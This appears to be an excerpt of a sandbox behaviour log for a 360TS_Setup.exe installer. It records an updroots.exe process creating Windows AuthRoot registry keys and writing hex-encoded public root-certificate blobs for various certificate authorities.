f61f89c53e593d1733ff8fd9d4f84ac55d1fd116363 C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1B2364FD4D4F52E89B2D0FAF33E4D62BD969921\Blob = 030000000100000014000000b1b2364fd4d4f52e89b2d0faf33e4d62bd969921090000000100000048000000304606082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b0601050507030606082b060105050703070b000000010000003a00000053006f0075007400680020004100660072006900630061006e00200050006f007300740020004f0066006600690063006500200043004100000020000000010000003d0600003082063930820421a003020102020102300d06092a864886f70d01010505003081ce310b3009060355040613025a41311530130603550408130c5765737465726e2043617065311630140603550407130d536f6d65727365742057657374312a3028060355040a1321536f757468204166726963616e20506f7374204f6666696365204c696d69746564311a3018060355040b13115341504f2054727573742043656e747265311d301b060355040313145341504f20436c617373203320526f6f742043413129302706092a864886f70d010901161a706b6961646d696e40747275737463656e7472652e636f2e7a61301e170d3130303931353030303030305a170d3330303931343030303030305a3081ce310b3009060355040613025a41311530130603550408130c5765737465726e2043617065311630140603550407130d536f6d65727365742057657374312a3028060355040a1321536f757468204166726963616e20506f7374204f6666696365204c696d69746564311a3018060355040b13115341504f2054727573742043656e747265311d301b060355040313145341504f20436c617373203320526f6f742043413129302706092a864886f70d010901161a706b6961646d696e40747275737463656e7472652e636f2e7a6130820222300d06092a864886f70d01010105000382020f003082020a0282020100ca781a07bcf6fbb4b789bcd01956382a599d07ea1af9f8f868675e8fefcaf7f56a89e6a3957fa9db29241c35d038966c3e5624ff5e6251902e87e89cc7dabc33f19ea16f0b8e0a24f4f84d90a6b2cd5e11d3c2974cf55f401d26244d8d09100bffbb201b9326190c433fe98ebc3137106e91ca48825646c7bcb93a9e468166cfd9e85c10cf399e65c39ec55af44bcc44996686f4721ba35349eaae47cd320d70e6a0a076079dff58efe43c91c0b5e4dcb8010cd3feb342a03b6102d4375bd74c4595d2755df56e305f57518bb2ff7ec88b9caaa341370c1091a8a6855cb9c78f0551b2d078d2e24b49e9d41aa73bacaa33e69a2a0340986f7452133194d112c1b4cb30f9ff44b8925b52d630d933d175e319a51615b75457f15650ce4ebe033b2fecb630ee14605e5f7a35f44e640711eaa507661b6e93e2b04f5ed6e044e0b3dcaeefb8fda8b3ecece5398844b4a1bb1460648fd69293cbf3cc50dde907c86767f9f0878491b20062e9bf4a1574c5bf044c05465d0acbe5ea6100e16f41b1348ea600a27ca6a5a6fa6c4c43e5a8269a34981e8798e74c78d18f9f05555d8a4bc9cfa00b7d06909c1892b2c4b2d7e345d96b73c39739bf291e06095540babcda487543edfe447e3d2ce6629103fd3d89ef7ef45d248fa50b2bb33e7a2928bcbb3fbfeb778504268b94b290f5eb8d4fa2442250a89c2a4448007819ab9d0896150203010001a320301e300e0603551d0f0101ff040403020106300c0603551d13040530030101ff300d06092a864886f70d0101050500038202010045c99ea4602589fe9799b8c2f1aed735133679d0dd822251f14cf66336a10d5b20f21b85d6768f790fababa2c837b82963ece59eb67896a6ff8a109e146e1a6ddf5e9bb92c857209f2371a9b79b328efe596dd469b878c8df8418c14e1ad455fcba7240cc137ba2c02c4ab8c353809e990f16672a5914279090a144e9a749645a12f20a497742acb01b3cb562ade2c585f176762be2bba11132d10404561f0c3c5ef8f19d03ac2650ad968e89c062037ba9f4b16396078e0756255c0d9cb372109109039cf5c99ecdfacd65a474123abb8a721079214ac8cda8a2416eb148848bcef81ce8e16df3dd25a6f9fc041712589062ce6bc4feda491f3c6ed54ddd9930322aa8407a873dba75a894df6ed7280eb837844a922246898b13fa941f2ece904a422335fe675dcbd9e25f5e364651ec1f357272ec9c0327844dbd8381376e11d7fe017879a7f4d4b076eb8573885b9e9534e973a0d1f53b981724546f3c87ea609ee1834757e87e7e820eedc16d4e6c784aada6f5f9ccceb580641938ce5cc590c6865393c291661f169fb47b9c2d86781240bf4fc496200af07a3ff9ea00ec3018b2167d63b1b3ce0a1b76ddc554be3d02e9dd69eca6ebab3baf0607e7f0550e341f1be403a9057e02d696c0bc1bc7ac18efb09deea957f399bc3639f49f578af7e4982ac9f6e8c121a50b6c0e3dc8482d8ebd2bb0e5d368602492b053b57 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9078C5A28F9A4325C2A7C73813CDFE13C20F934E\Blob = 0300000001000000140000009078c5a28f9a4325c2a7c73813cdfe13c20f934e090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000004800000053004500520056004900430049004f0053002000440045002000430045005200540049004600490043004100430049004f004e0020002d00200041002e004e002e0043002e0000002000000001000000ff030000308203fb308202e3a003020102020436e58d9e300d06092a864886f70d01010505003081b4310b3009060355040613025559312b3029060355040a132241444d494e495354524143494f4e204e4143494f4e414c20444520434f5252454f53311f301d060355040b1316534552564943494f5320454c454354524f4e49434f53312c302a06035504031323534552564943494f532044452043455254494649434143494f4e202d20412e4e2e432e31293027060a0992268993f22c6401031419636f7272656f5f6365727440636f7272656f2e636f6d2e7579301e170d3939303330393231303830375a170d3039303330393231303830375a3081b4310b3009060355040613025559312b3029060355040a132241444d494e495354524143494f4e204e4143494f4e414c20444520434f5252454f53311f301d060355040b1316534552564943494f5320454c454354524f4e49434f53312c302a06035504031323534552564943494f532044452043455254494649434143494f4e202d20412e4e2e432e31293027060a0992268993f22c6401031419636f7272656f5f6365727440636f7272656f2e636f6d2e757930820122300d06092a864886f70d01010105000382010f003082010a0282010100b22a2fec2b596a439389462a8ae5ecfa05fae2c8de416baf03db005aef4837cf5789fbddc99210de7703951c903ec7b667253b5598efd93cfe26e48a3b44a97437830a772774b8a971addd9713d2caa22eb8ba9dc9be59e8d972f28a85661c475eb48782d60fdf6726a6bd36b1f35d90505176322c3b2faa5f615ee354d5125dff0d8d11c7827a36dfe14c16c474dd2d6aefd0b1f033a7febf376743122e794a94af84fb0711084e309375e90154cec5de1486f0aeae9b72250f4477e2f36caf799c2e49c79e987632169abc00dee0b420059117dd801514ee3641c4218feed9004a19c67161a5115d003be4a7746c3a4a6e83e07a315c2165f80887428767e50203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100991f49225cf8657f836e90662f02cfb4f6563a6636a1b7920d36c34558364be6ccf15acc73329e9aa8aed376ebeffe802ce31034b2479f1c256ae844b58f4cbe81f3d0c0c10bcd0316a04255564ec1e3b420ad5f9bb6555f481012ef24b3567ccc051bb2c92aa96811927e2fe93f44f1d0c6901b4bddf76122ec69861540b3e2a56a77f3b3f25427da492a6419f439de7c7686d99c72570a34f5f52fd039681bdb45a518e380543b93109014c21401aaa5762d7d0fe456f3ff732a6f8ec1d880fbbb901d1b1a499c0463c4421df36fbbb3494add47ed49ba022d2a8cc70356b9e268d0c1b086b58c4b3aae8d1c88844cfd50af99267608c280ad287955d32de6 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\06083F593F15A104A069A46BA903D006B7970991\Blob = 0b00000001000000520000004e00650074004c006f0063006b0020004100720061006e0079002000280043006c00610073007300200047006f006c0064002900200046005101740061006e00fa007300ed0074007600e1006e0079000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030703000000010000001400000006083f593f15a104a069a46ba903d006b797099120000000010000001904000030820415308202fda003020102020649412ce40010300d06092a864886f70d01010b05003081a7310b30090603550406130248553111300f06035504070c08427564617065737431153013060355040a0c0c4e65744c6f636b204b66742e31373035060355040b0c2e54616ec3ba73c3ad7476c3a16e796b696164c3b36b202843657274696669636174696f6e205365727669636573293135303306035504030c2c4e65744c6f636b204172616e792028436c61737320476f6c64292046c59174616ec3ba73c3ad7476c3a16e79301e170d3038313231313135303832315a170d3238313230363135303832315a3081a7310b30090603550406130248553111300f06035504070c08427564617065737431153013060355040a0c0c4e65744c6f636b204b66742e31373035060355040b0c2e54616ec3ba73c3ad7476c3a16e796b696164c3b36b202843657274696669636174696f6e205365727669636573293135303306035504030c2c4e65744c6f636b204172616e792028436c61737320476f6c64292046c59174616ec3ba73c3ad7476c3a16e7930820122300d06092a864886f70d01010105000382010f003082010a0282010100c4245e73be4b6d14c3a1f4e397906ed230451e3cee67d964e01a8a7fca30ca83e320c1e3f43ad3945f1a7c5b6dbf304f8427f69f1f49bcc6990a90f20ff57f43843763518b7aa570fc7a58cd8e9bedc3466c84705ddaf3019023fc4e30a97ee12763e7ed643ca0b8c93363fe1690ffb0b8fdd7a8c0c094430bb6d559a69e56d0241f7079afdb39540d6575d915419401af5eecf68df1ffad64fe209ad75cebfea61f0864a38b7655ad1e3b28602e8725e8aaaf1fc6644620b7707f3cde48db9653b73977e41ae2c7168476975b2fbb191585f86985f599a7a9f234a7a9b6a603fc6f863d547c76049b6bf9405d0034c72e99759de58803aa4df803d24276c01b020300a88ba345304330120603551d130101ff040830060101ff020104300e0603551d0f0101ff040403020106301d0603551d0e04160414ccfa6793f0b6b8d0a5c01ef353fd8c53df83d796300d06092a864886f70d01010b05000382010100ab7fee1c16a99c3c5100a0c0110805a799e66f018854616ef1b918ad4aadfe814023942ffb757c2f284b622481820bf561f11c6eb86138eb81fa62a13b5a62d39465c4e1e66d82f82f2570b22126c172511f8c2cc38490c35a8fbacff4a765a5eb98d1fb05b2467515236a6f85633080f0d59e1f291cc26cb050595d905b3ba80d30cfbf7d7fcef19d83bdc9466e20a6f96151ba212f7bbea51563a1d49587f19eb9f389f33d85b8b8dbbeb5b929f9da3705004994038444e7bf4331cf758b25d1f4a664f592f6ab05eb3de9a50b3662dacc065f368bb65e31b82afb5ef671df44269ec4e60d91b42e759580516a4b30a6b062a193f19bd8cec463753f5947b1 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0B7199A1C7F3ADDF7BA7EAB8EB574AE80D60DDDE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1EAC3E5B82476E9D50B1EC67D2CC11E12E0B491 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\28903A635B5280FAE6774C0B6DA7D6BAA64AF2E8 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0B77BEBBCB7AA24705DECC0FBD6A02FC7ABD9B52 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\84429D9FE2E73A0DC8AA0AE0A902F2749933FE02\Blob = 0b000000010000007e0000004100750073007400720061006c00690061006e00200044006500660065006e006300650020004f007200670061006e00690073006100740069006f006e0020002800410044004f002900200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900200030003200000009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030303000000010000001400000084429d9fe2e73a0dc8aa0ae0a902f2749933fe022000000001000000dd030000308203d9308202c1a00302010202020715300d06092a864886f70d01010505003057310b3009060355040613024155310c300a060355040a1303474f56310c300a060355040b1303446f44310c300a060355040b1303504b49310c300a060355040b13034341733110300e0603550403130741444f43413032301e170d3131303930313034323630375a170d3139303132373032333132345a3057310b3009060355040613024155310c300a060355040a1303474f56310c300a060355040b1303446f44310c300a060355040b1303504b49310c300a060355040b13034341733110300e0603550403130741444f4341303230820122300d06092a864886f70d01010105000382010f003082010a0282010100e4508548778fbeff49d1bb75ae87200a9641252bbc4607ddcb0486952c492ebd460c0ef758a0601685da5d3be3755e427d646c8fc15d296441b285b71b46bd85dad73a1db2b4f14a3dfe1edac8ee869da36a510be44598afd81b48bc3c1422ed2b9f3b7f6f333cd67dace0794fbf6593cb172a6fbc7a0fe95b5fe10c2afb4052364a5d6538cb59c148b3a49185165d787dc2cf2d33ee594ac8e661b3861f84c8b81a6c9ed160b48235ebbd23a82f935450ce245e31aed36a342c618737461e4389c680cb2203d3c9852e1f9bb1ac394b4d60f28a611bff83b12c738f8842c02db1ca9ec09567747b96e46a7a8e4145a034f3ceb8e7e28ff35055646fb9202b930203010001a381ae3081ab300c0603551d13040530030101ff304b0603551d2004443042303806092a2401824e01010101302b302906082b06010505070201161d687474703a2f2f7777772e646566656e63652e676f762e61752f706b6930060604551d2000300e0603551d0f0101ff0404030201c6301f0603551d23041830168014e9e79deb35bdb8b22b4958f4bc927d8b718a115a301d0603551d0e04160414e9e79deb35bdb8b22b4958f4bc927d8b718a115a300d06092a864886f70d0101050500038201010056d0a8c86cc9b4acf13b81752b11c4f656b457aec292195c96730aed2e439c642a597813b5508c4e6a9054f3193e1618cf4313c93273f855e0cad092193e65a3de80121c51a5182cc069ddb78632aff0adcfe0c323c4e5fcb63f0b05d7963a645e778c84cef1dccd040adc97f1211cc77d30255dd7203595c3871db63fdb53e22aa4f819173a0c15eeb3053831ee4571dd97fb78718602f49f34197349102ba07ff1c9faa0f258233116f8105082bb5dd2eaef69dd67765538c7a80e0380384f00206bdf2b6593db08af606c3420a8ad483f107ea6c3940195e1812ca0ed8cae544e3a4bc3d2c2cf7e027cef2a2cbbecdadec501af9449ed0fc2bf0e90692d6b C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F9B5B632455F9CBEEC575F80DCE96E2CC7B278B7 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDE1D2A901802E1D875E84B3807E4BB1FD994134 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\FAAA27B8CAF5FDF5CDA98AC3378572E04CE8F2E0\Blob = 0b00000001000000500000005300700061006e006900730068002000500072006f007000650072007400790020002600200043006f006d006d006500720063006500200052006500670069007300740072007900200043004100000009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070309030000000100000014000000faaa27b8caf5fdf5cda98ac3378572e04ce8f2e02000000001000000de050000308205da308204c2a00302010202043cce73d0300d06092a864886f70d01010505003082010c310b300906035504061302657331453043060355040a133c536572766963696f2064652043657274696669636163696f6e2064656c20436f6c6567696f206465205265676973747261646f726573202853435229311b3019060355040b1312436572746966696361646f2050726f70696f31193017060355040b1310436572746966696361646f205261697a312a302806035504031321436572746966696361646f206465206c6120436c617665205072696e636970616c312c302a060355040913235072696e636970652064652056657267617261203732203238303036204d61647269643124302206092a864886f70d0109011615736372407265676973747261646f7265732e6f7267301e170d3032303433303130333935305a170d3132303432373039333935305a3082010c310b300906035504061302657331453043060355040a133c536572766963696f2064652043657274696669636163696f6e2064656c20436f6c6567696f206465205265676973747261646f726573202853435229311b3019060355040b1312436572746966696361646f2050726f70696f31193017060355040b1310436572746966696361646f205261697a312a302806035504031321436572746966696361646f206465206c6120436c617665205072696e636970616c312c302a060355040913235072696e636970652064652056657267617261203732203238303036204d61647269643124302206092a864886f70d0109011615736372407265676973747261646f7265732e6f726730820122300d06092a864886f70d01010105000382010f003082010a0282010100a9142b9008fd1080bcdea9083f0b99c99076108d155be19f44b645e89120e0ff6b697c25f95600770c3841d7c19bcbf7d1802839a7d542719a8299f152ca8072e1ad44768512e2f78ae01b9b511dcf645b3e614864bfafb5fe5944704c0b50c74cc14c6db10878e68720c8ab9fb40971f6cd4569ed7762f02a84db87183706b9a20a7377bc4ef019a6f82a13dfd56e30342824339ae731521aea103bea62cc4a2e6d38963523782a38d7170dc03a25f87757690b3d7c54fc02add9acedf5c1fab37c9dc5562bdaa93fe7aa1b90cf16886f47ccf8ed0797d5c2077aea00f7e3c4bc4af9360a88e5074db0759ebbe50406156b8d2d96aebe4dbe2083d76096c1e30203010001a382013e3082013a300f0603551d130101ff040530030101ff308201250603551d200482011c30820118308201140604551d20003082010a3081c506082b060105050702023081b81a81b54573746520636572746966696361646f20657320656d697469646f20792064656265207574696c697a6172736520736567756e206c6f2064697370756573746f20656e2073757320436f6e646963696f6e65732064652043657274696669636163696f6e207920656e20656c205265676c616d656e746f2064656c205343522e20687474703a2f2f7777772e7265676973747261646f7265732e6f72672f7363722f6e6f726d61746976612f63705f66322e68746d304006082b060105050702011634687474703a2f2f7777772e7265676973747261646f7265732e6f72672f7363722f6e6f726d61746976612f63705f66322e68746d300d06092a864886f70d01010505000382010100702bcb0474667ee70d228b1256eb16637758b0db09fa97f5dbbd34d08f6849e0cddfee5cb5b193859ec2741e92994a729a07a02b48a0499bba7b20442e71f866815bb9b8aca4a4a5c19aa4b471091ee62890b112d69eaf76dde200f2ae7eca7741731b2297dcac27c217979f52f4967167977d48905e7171e39f51e887d3974fea3f77509d8805f351ea2edb1303b57e3fc4040e96fe259bb09c5b9e72aa8621654f65c8903b1a105d2d4985436869b62c67a352a8687bae4f3a70f195e0b3ea2312525332c264a168a65450a28378718008fcbc48934c5c5e9be578e1dc8333b18e16a79d11fc4ad72f62fa032f1fac00f6e8774546bf1ff2a109e8db0d02b9 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5922A1E15AEA163521F898396A4646B0441B0FA9\Blob = 0b00000001000000400000004f004900530054004500200057004900530065004b0065007900200047006c006f00620061006c00200052006f006f0074002000470041002000430041000000090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080300000001000000140000005922a1e15aea163521f898396a4646b0441b0fa92000000001000000f5030000308203f1308202d9a0030201020210413d72c7f46b1f81437df1d22854df9a300d06092a864886f70d010105050030818a310b30090603550406130243483110300e060355040a1307574953654b6579311b3019060355040b1312436f7079726967687420286329203230303531223020060355040b13194f4953544520466f756e646174696f6e20456e646f72736564312830260603550403131f4f4953544520574953654b657920476c6f62616c20526f6f74204741204341301e170d3035313231313136303334345a170d3337313231313136303935315a30818a310b30090603550406130243483110300e060355040a1307574953654b6579311b3019060355040b1312436f7079726967687420286329203230303531223020060355040b13194f4953544520466f756e646174696f6e20456e646f72736564312830260603550403131f4f4953544520574953654b657920476c6f62616c20526f6f7420474120434130820122300d06092a864886f70d01010105000382010f003082010a0282010100cb4fb3009b3d36ddf9d1496a6b10491fecd82bb2c6f832812943954c9a1923211545dee3c81c51555bae93e837ff2b6be9d4eabe2adda8512bd766c3615c6002c8f5ce727b3bb8f24e65089acda46a19c101bb73a6d7f6c3ddcdbca48bb59961b801a2a3d44dd4053d91adf8b4087164af70f11c6b7ef6c3779d24737be40c8ce1d936e1998b05990bed453109cac200dbf772a096aa9587d08ec7b661730d76668cdc1bb463a29f7f931330f1a127dbd9ff2c558891a0e04f07b028568c181b97448e89dde0176ee72aef8f390a318482d84014492e7a41e4a7fee364ccc159714b2c21a75b7de01dd12e819bc3d868f7bd961bac70b116140bdb60b92601050203010001a351304f300b0603551d0f040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b3037eae36bcb079d1dc9426b611be21b2698694301006092b06010401823715010403020100300d06092a864886f70d010105050003820101004ba1ff0b876eb3f9c143b148f328c01d2ec90941fa94001ca4a4ab494f8f3d1eef4d6fbdbca4f6f22630c910ca1d88fb74191f8545bdb06c51f9367edbf54c323a414f5b47cfe80b2db6c4199d74c547c63b6a0fac14db3cf4739ca905df00dc7478faf83560590213187cbcfb4db0206d43bb60307a67335cc599d1f82d395273fb8caa97255c72d9081eab4e3ce381319f03a6fbc0fe298855da84d55003b6e284a3a636aa113a01e1184bd64468b33df9537484b34691469600b7802cb6e1e310e2dba2e7288f019662163e00e31ca5368118a24c5276c011a36ee61dbae35abe3653c53e758f8669295853b59cbb6f9f5cc518ecdd2fe198c9fcbedf0a0d C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\9957C53FC59FB8E739F7A4B7A70E9B8E659F208C C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\786A74AC76AB147F9C6A3050BA9EA87EFE9ACE3C C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4A058FDFD761DB21B0C2EE48579BE27F42A4DA1C\Blob = 0300000001000000140000004a058fdfd761db21b0c2ee48579be27f42a4da1c090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703080b000000010000001a00000044002d0054005200550053005400200047006d00620048000000200000000100000099040000308204953082037da0030201020203030e95300d06092a864886f70d0101050500304b310b300906035504061302444531153013060355040a0c0c442d547275737420476d62483125302306035504030c1c442d545255535420526f6f7420436c61737320322043412032303037301e170d3037303531363035323034375a170d3232303531363035323034375a304b310b300906035504061302444531153013060355040a0c0c442d547275737420476d62483125302306035504030c1c442d545255535420526f6f7420436c6173732032204341203230303730820122300d06092a864886f70d01010105000382010f003082010a0282010100b3cde4841549f8e4d6ce84b39aadf63075900d84ebeedab37a752ae23ba4ea302ceb3d778d8184684aa6a468dc9073613465071d23a50ce6bfd3dd335dda32eda60d53a6746a5c1959a64cb52f79015e9e7f4afabac9277ed4ffcd005920eb06ccb344cfd685e9ed3b0c6cc1ea8c5ce0b9a902f0130027939c50fecd134f6d1b6aaadd0fff462519dce15e50ac1a7f0ecbdaee20fcc3f49c4a78356eee31c745167285d28220db52457c3cbf5957f9877456985b1d508ecc2fb3b33f8beeec37490188efd8210c93d3f66e894fba17cb4481b77ba723bb740ad3d8ea374527ffdcf09e43e3ba7b8a1b9a7de986a0fe2fd1d6f68757aaf22994877315fa6a4ead0203010001a38201803082017c300f0603551d130101ff040530030101ff301d0603551d0e041604149130abf6f3c644b7ebdd28bc0f149f525d627f02303906082b06010505070101042d302b302906082b06010505073001861d687474703a2f2f75736572732e6f6373702e642d74727573742e6e657430330603551d11042c302a8110696e666f40642d74727573742e6e65748616687474703a2f2f7777772e642d74727573742e6e6574300e0603551d0f0101ff0404030201063081c90603551d1f0481c13081be3081bba081b8a081b586766c6461703a2f2f6469726563746f72792e642d74727573742e6e65742f434e3d442d5452555354253230526f6f74253230436c617373253230322532304341253230323030372c4f3d442d5472757374253230476d62482c433d44453f63657274696669636174657265766f636174696f6e6c697374863b687474703a2f2f7777772e642d74727573742e6e65742f63726c2f642d74727573745f726f6f745f636c6173735f325f63615f323030372e63726c300d06092a864886f70d010105050003820101005b8bf243e3052e641fd592a9516b64fc0e46cc0799e2b7fc932920dcfc2f60e4ac7d2532ed10e10f6fdbf2bc4eee41c9b3d407487a0aafa4b6ff5130edcbd29ceb7f50ee4be262a734c220f6f3f6f536c0cb9110ebed2e8df4071a210c3577f47c2d8d49a5d70b4468d5d2e2e50c783813cab14c52aa2ae5d5af5c05399d2dadbe2356d52f55f3de9dab8236a04db7599147eede83a5ea3b5e2705800b6d2c50f40137d5a37717ecfedd84f4c5f85092d04bc62ea38b40e4c337a377bdce2c55e2acdf5d6400babea76a3106fc996b5015259da9769aa74d2a9a0263eb70e7fe1126d018c5a61f0a4393f218d9f53979b8075d8c1fe63ff3c5cb2166317b7bcf C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\80BF3DE9A41D768D194B293C85632CDBC8EA8CF7 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3F85F2BB4A62B0B58BE1614ABB0D4631B4BEF8BA\Blob = 0b000000010000001200000056006500720069005300690067006e00000009000000010000000c000000300a06082b060105050703030300000001000000140000003f85f2bb4a62b0b58be1614abb0d4631b4bef8ba200000000100000006030000308203023082026b02107eb611ab32c841db5eac01e3959efffd300d06092a864886f70d01010505003081c1310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e313c303a060355040b1333436c6173732034205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204732313a3038060355040b1331286329203139393820566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d060355040b1316566572695369676e205472757374204e6574776f726b301e170d3938303531383030303030305a170d3138303531383233353935395a3081c1310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e313c303a060355040b1333436c6173732034205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204732313a3038060355040b1331286329203139393820566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d060355040b1316566572695369676e205472757374204e6574776f726b30819f300d06092a864886f70d010101050003818d0030818902818100baf0e4cff9c4ae8554b90757f98fc57f6811f8c417b044dce33073d52a622ab8d0cc1ced285b7ebd6adcb39124ca41623cfc0201bf1c1631940597766ea2adbd61176c4e3086f051372a50c7a86281dc5b4aaac1a0b46eeb2fe557c5b12b4070db5a4da18e1fbd031fd803d48f4c9971bce282cc58e8983a86d38638f300291f0203010001300d06092a864886f70d0101050500038181008a68628772e784900902db00b128ff18c5b563649a2bc1d2f75fe81f0cafc9ebf51da1047e3fe3a68ec71dfd2810757c3fcaf91726276f2bc1dbc9c36b7ca6c6dce55a8dfbef40c887ef1950365787f1f23fe5eaa3969997ad99af3bbf84b7d59e6c8b0aa3efe762fba677e82f4e86dd31a2f3ca5698ec879ed982af845241e8 C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4054DA6F1C3F4074ACED0FECCDDB79D153FB901D\Blob = 0b000000010000001e000000440053005400200041004300450053002000430041002000580036000000090000000100000016000000301406082b0601050507030406082b060105050703010300000001000000140000004054da6f1c3f4074aced0feccddb79d153fb901d20000000010000000d04000030820409308202f1a00302010202100d5e990ad69db778ecd807563b8615d9300d06092a864886f70d0101050500305b310b30090603550406130255533120301e060355040a13174469676974616c205369676e61747572652054727573743111300f060355040b13084453542041434553311730150603550403130e4453542041434553204341205836301e170d3033313132303231313935385a170d3137313132303231313935385a305b310b30090603550406130255533120301e060355040a13174469676974616c205369676e61747572652054727573743111300f060355040b13084453542041434553311730150603550403130e445354204143455320434120583630820122300d06092a864886f70d01010105000382010f003082010a0282010100b93df52cc994dc758a955d63e884777666b959915c46dd923e9ff90e03b43d6192bd2326b563ee92d29ed63cc80d905f6481b1a8080d4cd8f9d3052852b40125c5951c0c7e3e108475cfc1199163cfe8a89188b94352bb80b155898b31fad0b776be413d309aa422251773e81ee2d3ac2abd5b3821d52a4bd7557de33a55bdd76d6b02576be6477c08c882badea7873da16db83056c2b302815f2df5e29a301828b866d3cb01966fea8a4555d6e09dff672b1702a64e1a6a110b7eb77be798d68c766fc13bdb50937ee5d08e1f37b8bdbac69f6ce97c33f2323c2647fa272402c97e1d5b8842136a357c7d35e92e66917293d53226c474f553a3b35d9af609cb0203010001a381c83081c5300f0603551d130101ff040530030101ff300e0603551d0f0101ff0404030201c6301f0603551d11041830168114706b692d6f70734074727573746473742e636f6d30620603551d20045b30593057060a608648016503020101013049304706082b06010505070201163b687474703a2f2f7777772e74727573746473742e636f6d2f6365727469666963617465732f706f6c6963792f414345532d696e6465782e68746d6c301d0603551d0e041604140972064e18430fe5d6ccc36a8b317b788fa883b8300d06092a864886f70d01010505000382010100a3d88ed6b2dbce05e732cd01d30403e576e4562b9c9990e808306cdf7d3deee5bfb524408449e1d128aec4c23a533088f1f5776e51cafaff99af245f1ba0fdf2ac84cadfa9f05f042ead16bf219710813de3ff878d32dc94e5478a5e6a13c994953dd2eec83495d080d4ad320880543ce0bd5253d7527cb2693f7f7acf6a74cafa042a9c4c5a06a5e920ad45660f69f1ddbfe9e3328bfae0c1864d723c2ed893780a2af8d8d2273d19895f5a7b8a3bcc0cda51aec70bf72bb03705ecbc5723e238d29b68f35612884f427cb831c4b5dbe4c82134e9481135eefac79257c59f34e4c7f6f70e0b4c9c68787b7131c7eb1ee06741f3b7a0a7cde57a33366afa9a2b C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe N/A
